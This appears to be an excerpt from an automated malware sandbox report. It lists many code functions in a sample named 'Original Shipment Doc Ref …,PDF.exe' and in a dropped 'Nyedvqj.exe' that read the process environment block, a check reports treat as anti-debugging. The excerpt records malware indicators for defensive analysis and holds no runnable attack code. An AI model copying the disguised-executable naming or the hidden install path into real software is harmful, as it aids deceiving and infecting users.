Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C14257 mov eax, dword ptr fs:[00000030h]	11_2_00C14257
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]	11_2_00C3B260
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]	11_2_00C3B260
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA3A1C mov eax, dword ptr fs:[00000030h]	11_2_00BA3A1C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58A62 mov eax, dword ptr fs:[00000030h]	11_2_00C58A62
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov ecx, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	11_2_00B8AA16
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	11_2_00B8AA16
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B98A0A mov eax, dword ptr fs:[00000030h]	11_2_00B98A0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC927A mov eax, dword ptr fs:[00000030h]	11_2_00BC927A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]	11_2_00C053CA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]	11_2_00C053CA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBB390 mov eax, dword ptr fs:[00000030h]	11_2_00BBB390
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2397 mov eax, dword ptr fs:[00000030h]	11_2_00BB2397
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]	11_2_00B91B8F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]	11_2_00B91B8F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3D380 mov ecx, dword ptr fs:[00000030h]	11_2_00C3D380
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C4138A mov eax, dword ptr fs:[00000030h]	11_2_00C4138A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BADBE9 mov eax, dword ptr fs:[00000030h]	11_2_00BADBE9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C55BA5 mov eax, dword ptr fs:[00000030h]	11_2_00C55BA5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58B58 mov eax, dword ptr fs:[00000030h]	11_2_00C58B58
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	11_2_00BB3B7A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	11_2_00BB3B7A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]	11_2_00B8DB60
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C4131B mov eax, dword ptr fs:[00000030h]	11_2_00C4131B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8F358 mov eax, dword ptr fs:[00000030h]	11_2_00B8F358
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8DB40 mov eax, dword ptr fs:[00000030h]	11_2_00B8DB40
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58CD6 mov eax, dword ptr fs:[00000030h]	11_2_00C58CD6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9849B mov eax, dword ptr fs:[00000030h]	11_2_00B9849B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C414FB mov eax, dword ptr fs:[00000030h]	11_2_00C414FB
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]	11_2_00C1C450
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]	11_2_00C1C450
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBBC2C mov eax, dword ptr fs:[00000030h]	11_2_00BBBC2C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA746D mov eax, dword ptr fs:[00000030h]	11_2_00BA746D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBA44B mov eax, dword ptr fs:[00000030h]	11_2_00BBA44B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB35A1 mov eax, dword ptr fs:[00000030h]	11_2_00BB35A1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	11_2_00BBFD9B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	11_2_00BBFD9B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C38DF1 mov eax, dword ptr fs:[00000030h]	11_2_00C38DF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A190AF mov eax, dword ptr fs:[00000030h]	17_2_00A190AF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9080 mov eax, dword ptr fs:[00000030h]	17_2_009D9080
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov ecx, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]	17_2_00A53884
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]	17_2_00A53884
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D58EC mov eax, dword ptr fs:[00000030h]	17_2_009D58EC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]	17_2_00AA4015
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]	17_2_00AA4015
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]	17_2_009F0050
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]	17_2_009F0050
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A92073 mov eax, dword ptr fs:[00000030h]	17_2_00A92073
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1074 mov eax, dword ptr fs:[00000030h]	17_2_00AA1074
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]	17_2_00A061A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]	17_2_00A061A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A569A6 mov eax, dword ptr fs:[00000030h]	17_2_00A569A6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC182 mov eax, dword ptr fs:[00000030h]	17_2_009FC182
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A185 mov eax, dword ptr fs:[00000030h]	17_2_00A0A185
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02990 mov eax, dword ptr fs:[00000030h]	17_2_00A02990
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A641E8 mov eax, dword ptr fs:[00000030h]	17_2_00A641E8
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]	17_2_00A0513A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]	17_2_00A0513A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov ecx, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]	17_2_009FB944
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]	17_2_009FB944
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]	17_2_009DB171
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]	17_2_009DB171
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC962 mov eax, dword ptr fs:[00000030h]	17_2_009DC962
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FAB0 mov eax, dword ptr fs:[00000030h]	17_2_00A0FAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]	17_2_009EAAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]	17_2_009EAAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]	17_2_00A0D294
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]	17_2_00A0D294
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02AE4 mov eax, dword ptr fs:[00000030h]	17_2_00A02AE4
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02ACB mov eax, dword ptr fs:[00000030h]	17_2_00A02ACB
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F3A1C mov eax, dword ptr fs:[00000030h]	17_2_009F3A1C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]	17_2_009DAA16
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]	17_2_009DAA16
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]	17_2_00A14A2C
